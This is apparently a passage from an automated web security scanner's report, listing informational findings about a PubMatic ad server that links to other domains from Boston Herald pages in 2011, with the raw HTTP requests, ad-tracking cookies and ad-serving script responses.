17.117. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A3%3A40&ranreq=0.29115646169520915&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; USCC=ONE

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:20:23 GMT
Content-Length: 1971
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:20:22 GMT; path=/
Set-Cookie: _curtime=1316222423; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:30:23 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:20:23 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7155&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=C2EA6CF7-9FE1-41EF-A143-5C2E0AAC3454&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=News" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');

17.118. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A3&ranreq=0.09347362210974097&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=30568955&rk1=84725501&rk2=1316239623.514&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:37 GMT
Content-Length: 1837
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:37 GMT; path=/
Set-Cookie: _curtime=1316221537; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:15:37 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1564788760=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:37 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=9EBAE5DB-3E65-4546-8052-5CBEB0DC6923&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D30568955%26rk1%3D84725501%26rk2%3D1316239623.514%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...

17.119. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A6%3A23&ranreq=0.12309644045308232&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=76636540&rk1=31623743&rk2=1316239581.994&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:43:20 GMT
Content-Length: 1829
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:43:20 GMT; path=/
Set-Cookie: _curtime=1316223800; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:53:20 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=62D5D3F4-DD77-4EC1-8784-CECA48F4F5A2&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D76636540%26rk1%3D31623743%26rk2%3D1316239581.994%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...

17.120. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A15&ranreq=0.8340201647952199&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=94360478&rk1=27348771&rk2=1316239454.886&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:23:22 GMT
Content-Length: 1832
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:23:22 GMT; path=/
Set-Cookie: _curtime=1316222602; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:33:22 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=425DE137-1DCD-4761-A684-30F2689C509A&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D94360478%26rk1%3D27348771%26rk2%3D1316239454.886%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...

17.121. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A3&ranreq=0.6195143915247172&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Bottom&page=bh.heraldinteractive.com%2F/your_tax_dollars_at_work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:45:43 GMT
Content-Length: 1964
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:45:42 GMT; path=/
Set-Cookie: _curtime=1316223943; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:55:43 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:45:43 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7155&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=9BE87D73-F6D6-4F0C-AD2B-41EA0C9FD9A1&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=News" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');

17.122. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A45&ranreq=0.2675711310002953&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=60719089&rk1=94605455&rk2=1316239725.491&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:19 GMT
Content-Length: 1832
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:19 GMT; path=/
Set-Cookie: _curtime=1316221639; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:17:19 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1477666717=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:19 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=DF6F1023-DF46-4B55-9BE1-743D9864BCA3&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D60719089%26rk1%3D94605455%26rk2%3D1316239725.491%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...

17.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A34&ranreq=0.4114131892565638&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
